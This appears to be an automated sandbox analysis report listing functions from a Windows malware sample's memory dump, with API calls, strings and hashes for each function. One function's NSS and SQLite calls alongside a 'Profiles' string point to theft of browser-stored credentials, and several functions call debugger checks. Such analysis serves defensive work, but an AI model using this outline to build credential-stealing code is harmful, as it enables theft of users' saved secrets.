                                                                                                    • Opcode Fuzzy Hash: edecc0e9115195082c133874438130f62ac5f99104b5bfb48e235dd940d06894
                                                                                                    • Instruction Fuzzy Hash: D8427D70D00258DFDF14DFA9C9457EEBBB1AF49308F1080AEE445B7281DB789A85CB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004187EC, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 479COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: 4$;g~OS^I^NV$UTC_$]l
                                                                                                    • API String ID: 3519838083-94711056
                                                                                                    • Opcode ID: d2e02deddfa34f4e25130c55257cbef165057ecaf030124a5882d3c5d1121245
                                                                                                    • Instruction ID: c0c91f5fd6471e2e50090fd34c7bad8f20c85e4933e5248af696d8c31e721590
                                                                                                    • Opcode Fuzzy Hash: d2e02deddfa34f4e25130c55257cbef165057ecaf030124a5882d3c5d1121245
                                                                                                    • Instruction Fuzzy Hash: 8022AF70D002888BDF15EFA5C950AEDFBB5AF59304F1480AFE44577282DF781A89CB69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0044A480, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 450COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: |XF$|XF
                                                                                                    • API String ID: 0-514644214
                                                                                                    • Opcode ID: 2d847a52f5baafd09b63a6ef73b7ffb79837118a5456080be83dbd4c6ff1e96c
                                                                                                    • Instruction ID: a2fcbab35829f1a111f05cde10400a04ba28e7ece359143868105aa135b3a241
                                                                                                    • Opcode Fuzzy Hash: 2d847a52f5baafd09b63a6ef73b7ffb79837118a5456080be83dbd4c6ff1e96c
                                                                                                    • Instruction Fuzzy Hash: D5F16E71E402199FEF14CFA9C9806AEBBB1FF48314F15826ED819AB340D734AE11CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004627A4, Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
                                                                                                      • Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E
                                                                                                      • Part of subcall function 004571CB: _free.LIBCMT ref: 0045722D
                                                                                                      • Part of subcall function 004571CB: _free.LIBCMT ref: 00457263
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004627F8
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00462842
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00462908
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale$ErrorLast_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3140898709-0
                                                                                                    • Opcode ID: 03a44e678e49a72788f6fa958e4446c0cb9ca14480530f1661c040c35672a11a
                                                                                                    • Instruction ID: 8fdc4d0ca9bcdec7de62ba05e5a14b9e9ad91cb5cc159aebfe6bae3a79f0d915
                                                                                                    • Opcode Fuzzy Hash: 03a44e678e49a72788f6fa958e4446c0cb9ca14480530f1661c040c35672a11a
                                                                                                    • Instruction Fuzzy Hash: 4361D671A00907ABDB249F25CD82BAA73A8EF44310F10457BED05D6281F7B8D985DB5A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00446625, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0044671D
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00446727
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00446734
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                    • String ID:
                                                                                                    • API String ID: 3906539128-0
                                                                                                    • Opcode ID: 2d4006cb0a490a5fe41f1898d73e103fe16c5dc7b54f67e4d822d4b5d790393b
                                                                                                    • Instruction ID: 384e1e98cc9cb4c7df0328988c5faaeb1f33e534a7a093ac3da55adf85ff94e3
                                                                                                    • Opcode Fuzzy Hash: 2d4006cb0a490a5fe41f1898d73e103fe16c5dc7b54f67e4d822d4b5d790393b
                                                                                                    • Instruction Fuzzy Hash: 0331C274D0121C9BDB21DF65DD8978DBBB8BF08314F6041EAE41CA7250EB749B858F49
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0043E03E, Relevance: 4.6, APIs: 3, Instructions: 56timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetLocalTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000001,00000000), ref: 0043E076
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000), ref: 0043E084
                                                                                                      • Part of subcall function 0043D95B: FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,0043E09B,?,?,?,?,?,?,?,?,00000001), ref: 0043D970
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043E0B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 568878067-0
                                                                                                    • Opcode ID: c4a1475bebf23b47c5bec081c9681e59432db96943158db8f55715bca652824d
                                                                                                    • Instruction ID: 5dc5bb988949e37033fa7e8de2553708aac0068194ea5f1efb77c9820a47ae7e
                                                                                                    • Opcode Fuzzy Hash: c4a1475bebf23b47c5bec081c9681e59432db96943158db8f55715bca652824d
                                                                                                    • Instruction Fuzzy Hash: 53110DB1D00B189FDB25DFAAC8819EBFBF8FF08204B00492ED196D3650E774A504CB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0045C559, Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsDebuggerPresent.KERNEL32(?,00000001,?,0044EA2A,?,Microsoft Visual C++ Runtime Library,00012012,?,00000240,00000001,00421A95,?,?,?,00000000,00000480), ref: 0045C4E2
                                                                                                    • OutputDebugStringW.KERNEL32(00000000,?,0044EA2A,?,Microsoft Visual C++ Runtime Library,00012012,?,00000240,00000001,00421A95,?,?,?,00000000,00000480,A:\_Work\rc-build-v1-exe\json.hpp), ref: 0045C4F9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DebugDebuggerOutputPresentString
                                                                                                    • String ID:
                                                                                                    • API String ID: 4086329628-0
                                                                                                    • Opcode ID: 25770f6f7dd1c086d772aad6d8623a7e1a5b5ad8f89f666f21ef17a06f7924ca
                                                                                                    • Instruction ID: 0d2b1a0ade15b69f2d7347783be55e8742076589e60eba3c6b6eb5fe894b00fa
                                                                                                    • Opcode Fuzzy Hash: 25770f6f7dd1c086d772aad6d8623a7e1a5b5ad8f89f666f21ef17a06f7924ca
                                                                                                    • Instruction Fuzzy Hash: AE01B17110032D7BDA202E965C82B6F3759AB01767F180017FD15A6243EE69E81AA1AE
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00440985, Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0044099B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 2325560087-0
                                                                                                    • Opcode ID: 97ef42a2c544be722fb6d023d3c943f4503bb43cf0619ee2a3bcd1cbb7cb48ce
                                                                                                    • Instruction ID: 618e401a7c8a0adeb8250b96beae0f9c79fd158a929ca41e9a49ff9f097408f7
                                                                                                    • Opcode Fuzzy Hash: 97ef42a2c544be722fb6d023d3c943f4503bb43cf0619ee2a3bcd1cbb7cb48ce
                                                                                                    • Instruction Fuzzy Hash: 11514AB1A012068FEB14CF94D8917AEBBF0FB54314F24886AD515FB351E378A950CB58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004629F7, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
                                                                                                      • Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E
                                                                                                      • Part of subcall function 004571CB: _free.LIBCMT ref: 0045722D
                                                                                                      • Part of subcall function 004571CB: _free.LIBCMT ref: 00457263
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00462A4B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast_free$InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2003897158-0
                                                                                                    • Opcode ID: 61b0c6a9bb120798ef32ad72ce2bfbe8f939892477555181889b6636e3d09e98
                                                                                                    • Instruction ID: d4d0c1b07770b8756cd372bfa24e877e454908c764530ebdd94d195e8e0c32f5
                                                                                                    • Opcode Fuzzy Hash: 61b0c6a9bb120798ef32ad72ce2bfbe8f939892477555181889b6636e3d09e98
                                                                                                    • Instruction Fuzzy Hash: 0B21A171641606BBDB289AA5DD41ABB73A8EF44305F10007FFD01D6241FAB8DD45C75A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0046267E, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
                                                                                                      • Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E
                                                                                                    • EnumSystemLocalesW.KERNEL32(004627A4,00000001,00000000,?,-00000050,?,00462DD2,00000000,?,?,?,00000055,?), ref: 004626F0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2417226690-0
                                                                                                    • Opcode ID: 53abe61e9f7f88496ddc64f022bd9303cdf0d5838115ca1bfcc0d4334bffb6e6
                                                                                                    • Instruction ID: a214c30e2b0840ca46362df8f44745d076b74c97768bb3cb79ee071566a33ec8
                                                                                                    • Opcode Fuzzy Hash: 53abe61e9f7f88496ddc64f022bd9303cdf0d5838115ca1bfcc0d4334bffb6e6
                                                                                                    • Instruction Fuzzy Hash: 5A114C3B604B016FDB189F39C9915BAB791FF80359B15443EE98787740E7B57802C744
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0046258C, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
                                                                                                      • Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E
                                                                                                      • Part of subcall function 004571CB: _free.LIBCMT ref: 0045722D
                                                                                                      • Part of subcall function 004571CB: _free.LIBCMT ref: 00457263
                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004625E0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast_free$InfoLocale
                                                                                                    • String ID: 0&G$utf8
                                                                                                    • API String ID: 2003897158-2116212543
                                                                                                    • Opcode ID: baa68ca91bddc46cd499e0e5059263a9408ec52ec63f7120597c0508089360f4
                                                                                                    • Instruction ID: 2cc157241e3020f81b59ad1cb66ad8fdfb3320e9df6087c07224aede26a875a4
                                                                                                    • Opcode Fuzzy Hash: baa68ca91bddc46cd499e0e5059263a9408ec52ec63f7120597c0508089360f4
                                                                                                    • Instruction Fuzzy Hash: 8DF02832A01105BBD724AB74ED55EBE33ACDB45318F10007FFA02D7281EABCAD058759
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00462719, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
                                                                                                      • Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E
                                                                                                    • EnumSystemLocalesW.KERNEL32(004629F7,00000001,00000002,?,-00000050,?,00462D96,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00462763
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2417226690-0
                                                                                                    • Opcode ID: 4c64c37b66b48842290b7bf6991279d2d783927b0e0f57c7383964fc2e696d08
                                                                                                    • Instruction ID: ace6497e85dc02f5aee632768e4d279fd59aa01d0cd738ba3751b8fdf9a8d65e
                                                                                                    • Opcode Fuzzy Hash: 4c64c37b66b48842290b7bf6991279d2d783927b0e0f57c7383964fc2e696d08
                                                                                                    • Instruction Fuzzy Hash: 5BF028763007046FCB245F359881AB67B94EF80359F04443EF9014B690E6F95C02C644
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00458577, Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00452551: EnterCriticalSection.KERNEL32(?,?,00453DF7,00000000,00484E90,0000000C,00453DBE,?,?,00458540,?,?,0045736D,00000001,00000364,00000008), ref: 00452560
                                                                                                    • EnumSystemLocalesW.KERNEL32(0045856A,00000001,00485070,0000000C,00458A49,00000000), ref: 004585AF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1272433827-0
                                                                                                    • Opcode ID: c8bd6c6404a5ffb51839ad0765aab8f508ba7f1ba7e19109230fb052114a0333
                                                                                                    • Instruction ID: bd975b07eb74d256c9eb258310aeca0a503a7fc08ac9ff67c2137e3b57904c10
                                                                                                    • Opcode Fuzzy Hash: c8bd6c6404a5ffb51839ad0765aab8f508ba7f1ba7e19109230fb052114a0333
                                                                                                    • Instruction Fuzzy Hash: 2DF04472A40204EFE700DFA9E842B5C77B0EB06725F20452FF414E7291DB795904CF58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00462633, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004571CB: GetLastError.KERNEL32(?,?,?,00444B46,?,00438E89,00000000,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 004571D0
                                                                                                      • Part of subcall function 004571CB: SetLastError.KERNEL32(00000000,00000008,000000FF,?,0045136D,?,00000000,TokenIntegrityLevel,?,00438E89,S-1-5-18,00000000), ref: 0045726E
                                                                                                    • EnumSystemLocalesW.KERNEL32(0046258C,00000001,00000002,?,?,00462DF4,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0046266A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2417226690-0
                                                                                                    • Opcode ID: d103e07a5380b81aece0e4b7cd7bb1ce75df0e355c626d03c09c3e4d4cbf32a9
                                                                                                    • Instruction ID: 34286e696306eacaf8ba8f9a882d975dc3cd7aecf62a9ad536f58892c62780d6
                                                                                                    • Opcode Fuzzy Hash: d103e07a5380b81aece0e4b7cd7bb1ce75df0e355c626d03c09c3e4d4cbf32a9
                                                                                                    • Instruction Fuzzy Hash: ECF0553A30060567CB149F36D95576A7F94EFC1714B06806AEA068B291E2B9D843C799
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041E014, Relevance: .3, Instructions: 347COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b5b0e66b16ccbd8f0a40714c19fa5bdb7e71b6b32d28678020640cb824cf4a89
                                                                                                    • Instruction ID: 2b68b11eeb88712b8ce7400ea382997c22786c23b16cca6d2aeda21fdd285ab6
                                                                                                    • Opcode Fuzzy Hash: b5b0e66b16ccbd8f0a40714c19fa5bdb7e71b6b32d28678020640cb824cf4a89
                                                                                                    • Instruction Fuzzy Hash: 7AE11575E002299FCF14CFA9D590AEDBBF5FB88314F2481AAE855E7340D634A9818F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004484BA, Relevance: .2, Instructions: 159COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c0e3146ed4e506c00fe44265853dcf02891529dccaae15279d9a213ad0e351c1
                                                                                                    • Instruction ID: e946252db305763ed07a346dec792169a84f57976465df867b6f9558783c8005
                                                                                                    • Opcode Fuzzy Hash: c0e3146ed4e506c00fe44265853dcf02891529dccaae15279d9a213ad0e351c1
                                                                                                    • Instruction Fuzzy Hash: BC515E71E00119AFEF04CF99C981AAEBBB2EF88304F19805DE915AB341D7389E51DB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0045A5DD, Relevance: .1, Instructions: 104COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 82824502b330d7f56d0fd5b4110d415c4a04fe01cf4805b472d714490720a1ae
                                                                                                    • Instruction ID: ffbed51893eee56e5f0a6d5d594a499ec612e4216e0ed18c4b9e673d5f7a457b
                                                                                                    • Opcode Fuzzy Hash: 82824502b330d7f56d0fd5b4110d415c4a04fe01cf4805b472d714490720a1ae
                                                                                                    • Instruction Fuzzy Hash: D721B673F204394B770CC47E8C532BDB6E1C68C541745423EE8A6EA2C1D968D917E2E4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0045A4BD, Relevance: .1, Instructions: 81COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 90b5447c475a5e9687ff1c3da719cc89c4f53068e936a2e9c473093f8a0f27e2
                                                                                                    • Instruction ID: d4796199420aa186b6c44f707558acbf23b85472b2e64044f100dbabf6d3acde
                                                                                                    • Opcode Fuzzy Hash: 90b5447c475a5e9687ff1c3da719cc89c4f53068e936a2e9c473093f8a0f27e2
                                                                                                    • Instruction Fuzzy Hash: B911A723F30C296B675C81698C172BE91D2DBD824430F433BD826E7284F994DE23D294
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0041E857, Relevance: .1, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 32d2fa60569f027d70f6bd040317d7149808b2a5500fbd3f3a48173b9d07b044
                                                                                                    • Instruction ID: b08065770aaa3e5024261f6b8f27829de5e14fae179c59a4b636cbd334e7375d
                                                                                                    • Opcode Fuzzy Hash: 32d2fa60569f027d70f6bd040317d7149808b2a5500fbd3f3a48173b9d07b044
                                                                                                    • Instruction Fuzzy Hash: C02169705241B145864C5B3AAC2143BBB919B8721338B42BFED8BDA0D2C52ED5B5D7A4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0045A0B2, Relevance: .0, Instructions: 40COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a9a885f2fdba41f838a509d97cb48f81f2635d64a58ae0c9c204ea1fe0e0e8b7
                                                                                                    • Instruction ID: 0f35cd1cdfa2507b62c58bdd5256ef98e78387180735e39f6991d5b358c28599
                                                                                                    • Opcode Fuzzy Hash: a9a885f2fdba41f838a509d97cb48f81f2635d64a58ae0c9c204ea1fe0e0e8b7
                                                                                                    • Instruction Fuzzy Hash: 72F02B32650130DBC726DEAC8909B59739CF705B52F10825BED02E7392CAB8DE48D3CA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0045A03D, Relevance: .0, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a384c0fe3c91c4020970930302fec913fc5f6a764468d93dc06b5bc6a1ce926e
                                                                                                    • Instruction ID: b71f545da49f6d3db7369e6d6598d851a446798c0fa16d89008dba216badf81b
                                                                                                    • Opcode Fuzzy Hash: a384c0fe3c91c4020970930302fec913fc5f6a764468d93dc06b5bc6a1ce926e
                                                                                                    • Instruction Fuzzy Hash: EFF03031621224DBCB26DF8CD845A4973ACEB45B55F11415BE901EB292C6B8DE04C7D9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0045A081, Relevance: .0, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 538c0dc1fdeaa7f402cbd69b372671aa0434c65f5ed6242623221e9b96d6851e
                                                                                                    • Instruction ID: 493225b8908fd9986b6f6fb6852177c2f8e07a3ab156e225542957066ff3c255
                                                                                                    • Opcode Fuzzy Hash: 538c0dc1fdeaa7f402cbd69b372671aa0434c65f5ed6242623221e9b96d6851e
                                                                                                    • Instruction Fuzzy Hash: 45E08C32921238EBCB14DF89C94498AF3ECEB84F06B11419BB901E3252C678DE04C7E5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00422683, Relevance: 28.4, APIs: 6, Strings: 10, Instructions: 432COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00422688
                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 004226AC
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                      • Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                    • NSS_Init.NSS3(?,?,?,?,?,?), ref: 004227B6
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                      • Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7
                                                                                                    • sqlite3_finalize.NSS3(?), ref: 00422C80
                                                                                                    • sqlite3_close.NSS3(?), ref: 00422C8A
                                                                                                    • NSS_Shutdown.NSS3(?,00000001,?,?,?), ref: 00422CC1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$Deallocate$EnvironmentFolderInitPathShutdownVariable_strcatsqlite3_closesqlite3_finalize
                                                                                                    • String ID: #9$' t"$.$7$='= $G$Profiles$WKIW$nt${`z4
                                                                                                    • API String ID: 3790890743-686067381
                                                                                                    • Opcode ID: 80fb5755f1a410e0a9f9da7ad8b715660569b53c1d0220b19af1797c01d72068
                                                                                                    • Instruction ID: c9ba6cc73b6555bc485a7635afdeff473f944dfaad42a9601cbffc47b3617cf0
                                                                                                    • Opcode Fuzzy Hash: 80fb5755f1a410e0a9f9da7ad8b715660569b53c1d0220b19af1797c01d72068
                                                                                                    • Instruction Fuzzy Hash: 0612DD30E04298CADF25DBA5C9907EDBBB0AF59304F5041AED40977292EB781E89CF59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00452076, Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
